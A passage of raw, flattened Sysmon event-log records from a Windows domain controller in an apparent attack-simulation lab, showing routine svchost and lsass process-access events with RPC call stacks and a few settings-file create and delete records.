ll+51821 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.526{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.511{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.511{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\ImmersiveControlPanel\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.479{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:16.479 23542300x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.479{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.448{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.433{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 